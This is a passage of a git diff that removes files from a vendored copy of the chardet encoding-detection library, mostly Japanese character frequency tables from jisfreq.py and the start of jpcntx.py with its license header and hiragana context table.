-3407,3637,4766,6598,6599,3198,6600,4415,6601,3859,3199,6602,3473,4767,2811,4416, # 5232 -1856,3268,3200,2575,3996,3997,3201,4417,6603,3095,2927,6604,3143,6605,2268,6606, # 5248 -3998,3860,3096,2771,6607,6608,3638,2495,4768,6609,3861,6610,3269,2745,4769,4181, # 5264 -3553,6611,2845,3270,6612,6613,6614,3862,6615,6616,4770,4771,6617,3474,3999,4418, # 5280 -4419,6618,3639,3344,6619,4772,4182,6620,2126,6621,6622,6623,4420,4773,6624,3018, # 5296 -6625,4774,3554,6626,4183,2025,3746,6627,4184,2707,6628,4421,4422,3097,1775,4185, # 5312 -3555,6629,6630,2868,6631,6632,4423,6633,6634,4424,2414,2533,2928,6635,4186,2387, # 5328 -6636,4775,6637,4187,6638,1891,4425,3202,3203,6639,6640,4776,6641,3345,6642,6643, # 5344 -3640,6644,3475,3346,3641,4000,6645,3144,6646,3098,2812,4188,3642,3204,6647,3863, # 5360 -3476,6648,3864,6649,4426,4001,6650,6651,6652,2576,6653,4189,4777,6654,6655,6656, # 5376 -2846,6657,3477,3205,4002,6658,4003,6659,3347,2252,6660,6661,6662,4778,6663,6664, # 5392 -6665,6666,6667,6668,6669,4779,4780,2048,6670,3478,3099,6671,3556,3747,4004,6672, # 5408 -6673,6674,3145,4005,3748,6675,6676,6677,6678,6679,3408,6680,6681,6682,6683,3206, # 5424 -3207,6684,6685,4781,4427,6686,4782,4783,4784,6687,6688,6689,4190,6690,6691,3479, # 5440 -6692,2746,6693,4428,6694,6695,6696,6697,6698,6699,4785,6700,6701,3208,2727,6702, # 5456 -3146,6703,6704,3409,2196,6705,4429,6706,6707,6708,2534,1996,6709,6710,6711,2747, # 5472 -6712,6713,6714,4786,3643,6715,4430,4431,6716,3557,6717,4432,4433,6718,6719,6720, # 5488 -6721,3749,6722,4006,4787,6723,6724,3644,4788,4434,6725,6726,4789,2772,6727,6728, # 5504 -6729,6730,6731,2708,3865,2813,4435,6732,6733,4790,4791,3480,6734,6735,6736,6737, # 5520 -4436,3348,6738,3410,4007,6739,6740,4008,6741,6742,4792,3411,4191,6743,6744,6745, # 5536 -6746,6747,3866,6748,3750,6749,6750,6751,6752,6753,6754,6755,3867,6756,4009,6757, # 5552 -4793,4794,6758,2814,2987,6759,6760,6761,4437,6762,6763,6764,6765,3645,6766,6767, # 5568 -3481,4192,6768,3751,6769,6770,2174,6771,3868,3752,6772,6773,6774,4193,4795,4438, # 5584 -3558,4796,4439,6775,4797,6776,6777,4798,6778,4799,3559,4800,6779,6780,6781,3482, # 5600 -6782,2893,6783,6784,4194,4801,4010,6785,6786,4440,6787,4011,6788,6789,6790,6791, # 5616 -6792,6793,4802,6794,6795,6796,4012,6797,6798,6799,6800,3349,4803,3483,6801,4804, # 5632 -4195,6802,4013,6803,6804,4196,6805,4014,4015,6806,2847,3271,2848,6807,3484,6808, # 5648 -6809,6810,4441,6811,4442,4197,4443,3272,4805,6812,3412,4016,1579,6813,6814,4017, # 5664 -6815,3869,6816,2964,6817,4806,6818,6819,4018,3646,6820,6821,4807,4019,4020,6822, # 5680 -6823,3560,6824,6825,4021,4444,6826,4198,6827,6828,4445,6829,6830,4199,4808,6831, # 5696 -6832,6833,3870,3019,2458,6834,3753,3413,3350,6835,4809,3871,4810,3561,4446,6836, # 5712 -6837,4447,4811,4812,6838,2459,4448,6839,4449,6840,6841,4022,3872,6842,4813,4814, # 5728 -6843,6844,4815,4200,4201,4202,6845,4023,6846,6847,4450,3562,3873,6848,6849,4816, # 5744 -4817,6850,4451,4818,2139,6851,3563,6852,6853,3351,6854,6855,3352,4024,2709,3414, # 5760 -4203,4452,6856,4204,6857,6858,3874,3875,6859,6860,4819,6861,6862,6863,6864,4453, # 5776 -3647,6865,6866,4820,6867,6868,6869,6870,4454,6871,2869,6872,6873,4821,6874,3754, # 5792 -6875,4822,4205,6876,6877,6878,3648,4206,4455,6879,4823,6880,4824,3876,6881,3055, # 5808 -4207,6882,3415,6883,6884,6885,4208,4209,6886,4210,3353,6887,3354,3564,3209,3485, # 5824 -2652,6888,2728,6889,3210,3755,6890,4025,4456,6891,4825,6892,6893,6894,6895,4211, # 5840 -6896,6897,6898,4826,6899,6900,4212,6901,4827,6902,2773,3565,6903,4828,6904,6905, # 5856 -6906,6907,3649,3650,6908,2849,3566,6909,3567,3100,6910,6911,6912,6913,6914,6915, # 5872 -4026,6916,3355,4829,3056,4457,3756,6917,3651,6918,4213,3652,2870,6919,4458,6920, # 5888 -2438,6921,6922,3757,2774,4830,6923,3356,4831,4832,6924,4833,4459,3653,2507,6925, # 5904 -4834,2535,6926,6927,3273,4027,3147,6928,3568,6929,6930,6931,4460,6932,3877,4461, # 5920 -2729,3654,6933,6934,6935,6936,2175,4835,2630,4214,4028,4462,4836,4215,6937,3148, # 5936 -4216,4463,4837,4838,4217,6938,6939,2850,4839,6940,4464,6941,6942,6943,4840,6944, # 5952 -4218,3274,4465,6945,6946,2710,6947,4841,4466,6948,6949,2894,6950,6951,4842,6952, # 5968 -4219,3057,2871,6953,6954,6955,6956,4467,6957,2711,6958,6959,6960,3275,3101,4843, # 5984 -6961,3357,3569,6962,4844,6963,6964,4468,4845,3570,6965,3102,4846,3758,6966,4847, # 6000 -3878,4848,4849,4029,6967,2929,3879,4850,4851,6968,6969,1733,6970,4220,6971,6972, # 6016 -6973,6974,6975,6976,4852,6977,6978,6979,6980,6981,6982,3759,6983,6984,6985,3486, # 6032 -3487,6986,3488,3416,6987,6988,6989,6990,6991,6992,6993,6994,6995,6996,6997,4853, # 6048 -6998,6999,4030,7000,7001,3211,7002,7003,4221,7004,7005,3571,4031,7006,3572,7007, # 6064 -2614,4854,2577,7008,7009,2965,3655,3656,4855,2775,3489,3880,4222,4856,3881,4032, # 6080 -3882,3657,2730,3490,4857,7010,3149,7011,4469,4858,2496,3491,4859,2283,7012,7013, # 6096 -7014,2365,4860,4470,7015,7016,3760,7017,7018,4223,1917,7019,7020,7021,4471,7022, # 6112 -2776,4472,7023,7024,7025,7026,4033,7027,3573,4224,4861,4034,4862,7028,7029,1929, # 6128 -3883,4035,7030,4473,3058,7031,2536,3761,3884,7032,4036,7033,2966,2895,1968,4474, # 6144 -3276,4225,3417,3492,4226,2105,7034,7035,1754,2596,3762,4227,4863,4475,3763,4864, # 6160 -3764,2615,2777,3103,3765,3658,3418,4865,2296,3766,2815,7036,7037,7038,3574,2872, # 6176 -3277,4476,7039,4037,4477,7040,7041,4038,7042,7043,7044,7045,7046,7047,2537,7048, # 6192 -7049,7050,7051,7052,7053,7054,4478,7055,7056,3767,3659,4228,3575,7057,7058,4229, # 6208 -7059,7060,7061,3660,7062,3212,7063,3885,4039,2460,7064,7065,7066,7067,7068,7069, # 6224 -7070,7071,7072,7073,7074,4866,3768,4867,7075,7076,7077,7078,4868,3358,3278,2653, # 6240 -7079,7080,4479,3886,7081,7082,4869,7083,7084,7085,7086,7087,7088,2538,7089,7090, # 6256 -7091,4040,3150,3769,4870,4041,2896,3359,4230,2930,7092,3279,7093,2967,4480,3213, # 6272 -4481,3661,7094,7095,7096,7097,7098,7099,7100,7101,7102,2461,3770,7103,7104,4231, # 6288 -3151,7105,7106,7107,4042,3662,7108,7109,4871,3663,4872,4043,3059,7110,7111,7112, # 6304 -3493,2988,7113,4873,7114,7115,7116,3771,4874,7117,7118,4232,4875,7119,3576,2336, # 6320 -4876,7120,4233,3419,4044,4877,4878,4482,4483,4879,4484,4234,7121,3772,4880,1045, # 6336 -3280,3664,4881,4882,7122,7123,7124,7125,4883,7126,2778,7127,4485,4486,7128,4884, # 6352 -3214,3887,7129,7130,3215,7131,4885,4045,7132,7133,4046,7134,7135,7136,7137,7138, # 6368 -7139,7140,7141,7142,7143,4235,7144,4886,7145,7146,7147,4887,7148,7149,7150,4487, # 6384 -4047,4488,7151,7152,4888,4048,2989,3888,7153,3665,7154,4049,7155,7156,7157,7158, # 6400 -7159,7160,2931,4889,4890,4489,7161,2631,3889,4236,2779,7162,7163,4891,7164,3060, # 6416 -7165,1672,4892,7166,4893,4237,3281,4894,7167,7168,3666,7169,3494,7170,7171,4050, # 6432 -7172,7173,3104,3360,3420,4490,4051,2684,4052,7174,4053,7175,7176,7177,2253,4054, # 6448 -7178,7179,4895,7180,3152,3890,3153,4491,3216,7181,7182,7183,2968,4238,4492,4055, # 6464 -7184,2990,7185,2479,7186,7187,4493,7188,7189,7190,7191,7192,4896,7193,4897,2969, # 6480 -4494,4898,7194,3495,7195,7196,4899,4495,7197,3105,2731,7198,4900,7199,7200,7201, # 6496 -4056,7202,3361,7203,7204,4496,4901,4902,7205,4497,7206,7207,2315,4903,7208,4904, # 6512 -7209,4905,2851,7210,7211,3577,7212,3578,4906,7213,4057,3667,4907,7214,4058,2354, # 6528 -3891,2376,3217,3773,7215,7216,7217,7218,7219,4498,7220,4908,3282,2685,7221,3496, # 6544 -4909,2632,3154,4910,7222,2337,7223,4911,7224,7225,7226,4912,4913,3283,4239,4499, # 6560 -7227,2816,7228,7229,7230,7231,7232,7233,7234,4914,4500,4501,7235,7236,7237,2686, # 6576 -7238,4915,7239,2897,4502,7240,4503,7241,2516,7242,4504,3362,3218,7243,7244,7245, # 6592 -4916,7246,7247,4505,3363,7248,7249,7250,7251,3774,4506,7252,7253,4917,7254,7255, # 6608 -3284,2991,4918,4919,3219,3892,4920,3106,3497,4921,7256,7257,7258,4922,7259,4923, # 6624 -3364,4507,4508,4059,7260,4240,3498,7261,7262,4924,7263,2992,3893,4060,3220,7264, # 6640 -7265,7266,7267,7268,7269,4509,3775,7270,2817,7271,4061,4925,4510,3776,7272,4241, # 6656 -4511,3285,7273,7274,3499,7275,7276,7277,4062,4512,4926,7278,3107,3894,7279,7280, # 6672 -4927,7281,4513,7282,7283,3668,7284,7285,4242,4514,4243,7286,2058,4515,4928,4929, # 6688 -4516,7287,3286,4244,7288,4517,7289,7290,7291,3669,7292,7293,4930,4931,4932,2355, # 6704 -4933,7294,2633,4518,7295,4245,7296,7297,4519,7298,7299,4520,4521,4934,7300,4246, # 6720 -4522,7301,7302,7303,3579,7304,4247,4935,7305,4936,7306,7307,7308,7309,3777,7310, # 6736 -4523,7311,7312,7313,4248,3580,7314,4524,3778,4249,7315,3581,7316,3287,7317,3221, # 6752 -7318,4937,7319,7320,7321,7322,7323,7324,4938,4939,7325,4525,7326,7327,7328,4063, # 6768 -7329,7330,4940,7331,7332,4941,7333,4526,7334,3500,2780,1741,4942,2026,1742,7335, # 6784 -7336,3582,4527,2388,7337,7338,7339,4528,7340,4250,4943,7341,7342,7343,4944,7344, # 6800 -7345,7346,3020,7347,4945,7348,7349,7350,7351,3895,7352,3896,4064,3897,7353,7354, # 6816 -7355,4251,7356,7357,3898,7358,3779,7359,3780,3288,7360,7361,4529,7362,4946,4530, # 6832 -2027,7363,3899,4531,4947,3222,3583,7364,4948,7365,7366,7367,7368,4949,3501,4950, # 6848 -3781,4951,4532,7369,2517,4952,4252,4953,3155,7370,4954,4955,4253,2518,4533,7371, # 6864 -7372,2712,4254,7373,7374,7375,3670,4956,3671,7376,2389,3502,4065,7377,2338,7378, # 6880 -7379,7380,7381,3061,7382,4957,7383,7384,7385,7386,4958,4534,7387,7388,2993,7389, # 6896 -3062,7390,4959,7391,7392,7393,4960,3108,4961,7394,4535,7395,4962,3421,4536,7396, # 6912 -4963,7397,4964,1857,7398,4965,7399,7400,2176,3584,4966,7401,7402,3422,4537,3900, # 6928 -3585,7403,3782,7404,2852,7405,7406,7407,4538,3783,2654,3423,4967,4539,7408,3784, # 6944 -3586,2853,4540,4541,7409,3901,7410,3902,7411,7412,3785,3109,2327,3903,7413,7414, # 6960 -2970,4066,2932,7415,7416,7417,3904,3672,3424,7418,4542,4543,4544,7419,4968,7420, # 6976 -7421,4255,7422,7423,7424,7425,7426,4067,7427,3673,3365,4545,7428,3110,2559,3674, # 6992 -7429,7430,3156,7431,7432,3503,7433,3425,4546,7434,3063,2873,7435,3223,4969,4547, # 7008 -4548,2898,4256,4068,7436,4069,3587,3786,2933,3787,4257,4970,4971,3788,7437,4972, # 7024 -3064,7438,4549,7439,7440,7441,7442,7443,4973,3905,7444,2874,7445,7446,7447,7448, # 7040 -3021,7449,4550,3906,3588,4974,7450,7451,3789,3675,7452,2578,7453,4070,7454,7455, # 7056 -7456,4258,3676,7457,4975,7458,4976,4259,3790,3504,2634,4977,3677,4551,4260,7459, # 7072 -7460,7461,7462,3907,4261,4978,7463,7464,7465,7466,4979,4980,7467,7468,2213,4262, # 7088 -7469,7470,7471,3678,4981,7472,2439,7473,4263,3224,3289,7474,3908,2415,4982,7475, # 7104 -4264,7476,4983,2655,7477,7478,2732,4552,2854,2875,7479,7480,4265,7481,4553,4984, # 7120 -7482,7483,4266,7484,3679,3366,3680,2818,2781,2782,3367,3589,4554,3065,7485,4071, # 7136 -2899,7486,7487,3157,2462,4072,4555,4073,4985,4986,3111,4267,2687,3368,4556,4074, # 7152 -3791,4268,7488,3909,2783,7489,2656,1962,3158,4557,4987,1963,3159,3160,7490,3112, # 7168 -4988,4989,3022,4990,4991,3792,2855,7491,7492,2971,4558,7493,7494,4992,7495,7496, # 7184 -7497,7498,4993,7499,3426,4559,4994,7500,3681,4560,4269,4270,3910,7501,4075,4995, # 7200 -4271,7502,7503,4076,7504,4996,7505,3225,4997,4272,4077,2819,3023,7506,7507,2733, # 7216 -4561,7508,4562,7509,3369,3793,7510,3590,2508,7511,7512,4273,3113,2994,2616,7513, # 7232 -7514,7515,7516,7517,7518,2820,3911,4078,2748,7519,7520,4563,4998,7521,7522,7523, # 7248 -7524,4999,4274,7525,4564,3682,2239,4079,4565,7526,7527,7528,7529,5000,7530,7531, # 7264 -5001,4275,3794,7532,7533,7534,3066,5002,4566,3161,7535,7536,4080,7537,3162,7538, # 7280 -7539,4567,7540,7541,7542,7543,7544,7545,5003,7546,4568,7547,7548,7549,7550,7551, # 7296 -7552,7553,7554,7555,7556,5004,7557,7558,7559,5005,7560,3795,7561,4569,7562,7563, # 7312 -7564,2821,3796,4276,4277,4081,7565,2876,7566,5006,7567,7568,2900,7569,3797,3912, # 7328 -7570,7571,7572,4278,7573,7574,7575,5007,7576,7577,5008,7578,7579,4279,2934,7580, # 7344 -7581,5009,7582,4570,7583,4280,7584,7585,7586,4571,4572,3913,7587,4573,3505,7588, # 7360 -5010,7589,7590,7591,7592,3798,4574,7593,7594,5011,7595,4281,7596,7597,7598,4282, # 7376 -5012,7599,7600,5013,3163,7601,5014,7602,3914,7603,7604,2734,4575,4576,4577,7605, # 7392 -7606,7607,7608,7609,3506,5015,4578,7610,4082,7611,2822,2901,2579,3683,3024,4579, # 7408 -3507,7612,4580,7613,3226,3799,5016,7614,7615,7616,7617,7618,7619,7620,2995,3290, # 7424 -7621,4083,7622,5017,7623,7624,7625,7626,7627,4581,3915,7628,3291,7629,5018,7630, # 7440 -7631,7632,7633,4084,7634,7635,3427,3800,7636,7637,4582,7638,5019,4583,5020,7639, # 7456 -3916,7640,3801,5021,4584,4283,7641,7642,3428,3591,2269,7643,2617,7644,4585,3592, # 7472 -7645,4586,2902,7646,7647,3227,5022,7648,4587,7649,4284,7650,7651,7652,4588,2284, # 7488 -7653,5023,7654,7655,7656,4589,5024,3802,7657,7658,5025,3508,4590,7659,7660,7661, # 7504 -1969,5026,7662,7663,3684,1821,2688,7664,2028,2509,4285,7665,2823,1841,7666,2689, # 7520 -3114,7667,3917,4085,2160,5027,5028,2972,7668,5029,7669,7670,7671,3593,4086,7672, # 7536 -4591,4087,5030,3803,7673,7674,7675,7676,7677,7678,7679,4286,2366,4592,4593,3067, # 7552 -2328,7680,7681,4594,3594,3918,2029,4287,7682,5031,3919,3370,4288,4595,2856,7683, # 7568 -3509,7684,7685,5032,5033,7686,7687,3804,2784,7688,7689,7690,7691,3371,7692,7693, # 7584 -2877,5034,7694,7695,3920,4289,4088,7696,7697,7698,5035,7699,5036,4290,5037,5038, # 7600 -5039,7700,7701,7702,5040,5041,3228,7703,1760,7704,5042,3229,4596,2106,4089,7705, # 7616 -4597,2824,5043,2107,3372,7706,4291,4090,5044,7707,4091,7708,5045,3025,3805,4598, # 7632 -4292,4293,4294,3373,7709,4599,7710,5046,7711,7712,5047,5048,3806,7713,7714,7715, # 7648 -5049,7716,7717,7718,7719,4600,5050,7720,7721,7722,5051,7723,4295,3429,7724,7725, # 7664 -7726,7727,3921,7728,3292,5052,4092,7729,7730,7731,7732,7733,7734,7735,5053,5054, # 7680 -7736,7737,7738,7739,3922,3685,7740,7741,7742,7743,2635,5055,7744,5056,4601,7745, # 7696 -7746,2560,7747,7748,7749,7750,3923,7751,7752,7753,7754,7755,4296,2903,7756,7757, # 7712 -7758,7759,7760,3924,7761,5057,4297,7762,7763,5058,4298,7764,4093,7765,7766,5059, # 7728 -3925,7767,7768,7769,7770,7771,7772,7773,7774,7775,7776,3595,7777,4299,5060,4094, # 7744 -7778,3293,5061,7779,7780,4300,7781,7782,4602,7783,3596,7784,7785,3430,2367,7786, # 7760 -3164,5062,5063,4301,7787,7788,4095,5064,5065,7789,3374,3115,7790,7791,7792,7793, # 7776 -7794,7795,7796,3597,4603,7797,7798,3686,3116,3807,5066,7799,7800,5067,7801,7802, # 7792 -4604,4302,5068,4303,4096,7803,7804,3294,7805,7806,5069,4605,2690,7807,3026,7808, # 7808 -7809,7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,7824, # 7824 -7825,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,7840, # 7840 -7841,7842,7843,7844,7845,7846,7847,7848,7849,7850,7851,7852,7853,7854,7855,7856, # 7856 -7857,7858,7859,7860,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870,7871,7872, # 7872 -7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886,7887,7888, # 7888 -7889,7890,7891,7892,7893,7894,7895,7896,7897,7898,7899,7900,7901,7902,7903,7904, # 7904 -7905,7906,7907,7908,7909,7910,7911,7912,7913,7914,7915,7916,7917,7918,7919,7920, # 7920 -7921,7922,7923,7924,3926,7925,7926,7927,7928,7929,7930,7931,7932,7933,7934,7935, # 7936 -7936,7937,7938,7939,7940,7941,7942,7943,7944,7945,7946,7947,7948,7949,7950,7951, # 7952 -7952,7953,7954,7955,7956,7957,7958,7959,7960,7961,7962,7963,7964,7965,7966,7967, # 7968 -7968,7969,7970,7971,7972,7973,7974,7975,7976,7977,7978,7979,7980,7981,7982,7983, # 7984 -7984,7985,7986,7987,7988,7989,7990,7991,7992,7993,7994,7995,7996,7997,7998,7999, # 8000 -8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015, # 8016 -8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031, # 8032 -8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047, # 8048 -8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063, # 8064 -8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079, # 8080 -8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095, # 8096 -8096,8097,8098,8099,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110,8111, # 8112 -8112,8113,8114,8115,8116,8117,8118,8119,8120,8121,8122,8123,8124,8125,8126,8127, # 8128 -8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141,8142,8143, # 8144 -8144,8145,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155,8156,8157,8158,8159, # 8160 -8160,8161,8162,8163,8164,8165,8166,8167,8168,8169,8170,8171,8172,8173,8174,8175, # 8176 -8176,8177,8178,8179,8180,8181,8182,8183,8184,8185,8186,8187,8188,8189,8190,8191, # 8192 -8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8203,8204,8205,8206,8207, # 8208 -8208,8209,8210,8211,8212,8213,8214,8215,8216,8217,8218,8219,8220,8221,8222,8223, # 8224 -8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239, # 8240 -8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255, # 8256 -8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271) # 8272 diff --git a/chardet/chardet/jisfreq.pyc b/chardet/chardet/jisfreq.pyc deleted file mode 100644 index 899285b..0000000 Binary files a/chardet/chardet/jisfreq.pyc and /dev/null differ diff --git a/chardet/chardet/jpcntx.py b/chardet/chardet/jpcntx.py deleted file mode 100644 index 3abfe7b..0000000 --- a/chardet/chardet/jpcntx.py +++ /dev/null @@ -1,210 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants - -NUM_OF_CATEGORY = 6 -DONT_KNOW = -1 -ENOUGH_REL_THRESHOLD = 100 -MAX_REL_THRESHOLD = 1000 -MINIMUM_DATA_THRESHOLD = 4 - -# This is hiragana 2-char sequence table, the number in each cell represents its frequency category -jp2CharContext = ( \ -(0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1), -(2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4), -(0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2), -(0,4,0,5,0,5,0,4,0,4,5,4,4,3,5,3,5,1,5,3,4,3,4,4,3,4,3,3,4,3,5,4,4,3,5,5,3,5,5,5,3,5,5,3,4,5,5,3,1,3,2,0,3,4,0,4,2,0,4,2,1,5,3,2,3,5,0,4,0,2,0,5,4,4,5,4,5,0,4,0,0,4,4), -(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), -(0,3,0,4,0,3,0,3,0,4,5,4,3,3,3,3,4,3,5,4,4,3,5,4,4,3,4,3,4,4,4,4,5,3,4,4,3,4,5,5,4,5,5,1,4,5,4,3,0,3,3,1,3,3,0,4,4,0,3,3,1,5,3,3,3,5,0,4,0,3,0,4,4,3,4,3,3,0,4,1,1,3,4), -(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), -(0,4,0,3,0,3,0,4,0,3,4,4,3,2,2,1,2,1,3,1,3,3,3,3,3,4,3,1,3,3,5,3,3,0,4,3,0,5,4,3,3,5,4,4,3,4,4,5,0,1,2,0,1,2,0,2,2,0,1,0,0,5,2,2,1,4,0,3,0,1,0,4,4,3,5,4,3,0,2,1,0,4,3), -(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), -(0,3,0,5,0,4,0,2,1,4,4,2,4,1,4,2,4,2,4,3,3,3,4,3,3,3,3,1,4,2,3,3,3,1,4,4,1,1,1,4,3,3,2,0,2,4,3,2,0,3,3,0,3,1,1,0,0,0,3,3,0,4,2,2,3,4,0,4,0,3,0,4,4,5,3,4,4,0,3,0,0,1,4), -(1,4,0,4,0,4,0,4,0,3,5,4,4,3,4,3,5,4,3,3,4,3,5,4,4,4,4,3,4,2,4,3,3,1,5,4,3,2,4,5,4,5,5,4,4,5,4,4,0,3,2,2,3,3,0,4,3,1,3,2,1,4,3,3,4,5,0,3,0,2,0,4,5,5,4,5,4,0,4,0,0,5,4), -(0,5,0,5,0,4,0,3,0,4,4,3,4,3,3,3,4,0,4,4,4,3,4,3,4,3,3,1,4,2,4,3,4,0,5,4,1,4,5,4,4,5,3,2,4,3,4,3,2,4,1,3,3,3,2,3,2,0,4,3,3,4,3,3,3,4,0,4,0,3,0,4,5,4,4,4,3,0,4,1,0,1,3), -(0,3,1,4,0,3,0,2,0,3,4,4,3,1,4,2,3,3,4,3,4,3,4,3,4,4,3,2,3,1,5,4,4,1,4,4,3,5,4,4,3,5,5,4,3,4,4,3,1,2,3,1,2,2,0,3,2,0,3,1,0,5,3,3,3,4,3,3,3,3,4,4,4,4,5,4,2,0,3,3,2,4,3), -(0,2,0,3,0,1,0,1,0,0,3,2,0,0,2,0,1,0,2,1,3,3,3,1,2,3,1,0,1,0,4,2,1,1,3,3,0,4,3,3,1,4,3,3,0,3,3,2,0,0,0,0,1,0,0,2,0,0,0,0,0,4,1,0,2,3,2,2,2,1,3,3,3,4,4,3,2,0,3,1,0,3,3), -(0,4,0,4,0,3,0,3,0,4,4,4,3,3,3,3,3,3,4,3,4,2,4,3,4,3,3,2,4,3,4,5,4,1,4,5,3,5,4,5,3,5,4,0,3,5,5,3,1,3,3,2,2,3,0,3,4,1,3,3,2,4,3,3,3,4,0,4,0,3,0,4,5,4,4,5,3,0,4,1,0,3,4), -(0,2,0,3,0,3,0,0,0,2,2,2,1,0,1,0,0,0,3,0,3,0,3,0,1,3,1,0,3,1,3,3,3,1,3,3,3,0,1,3,1,3,4,0,0,3,1,1,0,3,2,0,0,0,0,1,3,0,1,0,0,3,3,2,0,3,0,0,0,0,0,3,4,3,4,3,3,0,3,0,0,2,3), -(2,3,0,3,0,2,0,1,0,3,3,4,3,1,3,1,1,1,3,1,4,3,4,3,3,3,0,0,3,1,5,4,3,1,4,3,2,5,5,4,4,4,4,3,3,4,4,4,0,2,1,1,3,2,0,1,2,0,0,1,0,4,1,3,3,3,0,3,0,1,0,4,4,4,5,5,3,0,2,0,0,4,4), -(0,2,0,1,0,3,1,3,0,2,3,3,3,0,3,1,0,0,3,0,3,2,3,1,3,2,1,1,0,0,4,2,1,0,2,3,1,4,3,2,0,4,4,3,1,3,1,3,0,1,0,0,1,0,0,0,1,0,0,0,0,4,1,1,1,2,0,3,0,0,0,3,4,2,4,3,2,0,1,0,0,3,3), -(0,1,0,4,0,5,0,4,0,2,4,4,2,3,3,2,3,3,5,3,3,3,4,3,4,2,3,0,4,3,3,3,4,1,4,3,2,1,5,5,3,4,5,1,3,5,4,2,0,3,3,0,1,3,0,4,2,0,1,3,1,4,3,3,3,3,0,3,0,1,0,3,4,4,4,5,5,0,3,0,1,4,5), -(0,2,0,3,0,3,0,0,0,2,3,1,3,0,4,0,1,1,3,0,3,4,3,2,3,1,0,3,3,2,3,1,3,0,2,3,0,2,1,4,1,2,2,0,0,3,3,0,0,2,0,0,0,1,0,0,0,0,2,2,0,3,2,1,3,3,0,2,0,2,0,0,3,3,1,2,4,0,3,0,2,2,3), -(2,4,0,5,0,4,0,4,0,2,4,4,4,3,4,3,3,3,1,2,4,3,4,3,4,4,5,0,3,3,3,3,2,0,4,3,1,4,3,4,1,4,4,3,3,4,4,3,1,2,3,0,4,2,0,4,1,0,3,3,0,4,3,3,3,4,0,4,0,2,0,3,5,3,4,5,2,0,3,0,0,4,5), -(0,3,0,4,0,1,0,1,0,1,3,2,2,1,3,0,3,0,2,0,2,0,3,0,2,0,0,0,1,0,1,1,0,0,3,1,0,0,0,4,0,3,1,0,2,1,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,4,2,2,3,1,0,3,0,0,0,1,4,4,4,3,0,0,4,0,0,1,4), -(1,4,1,5,0,3,0,3,0,4,5,4,4,3,5,3,3,4,4,3,4,1,3,3,3,3,2,1,4,1,5,4,3,1,4,4,3,5,4,4,3,5,4,3,3,4,4,4,0,3,3,1,2,3,0,3,1,0,3,3,0,5,4,4,4,4,4,4,3,3,5,4,4,3,3,5,4,0,3,2,0,4,4), 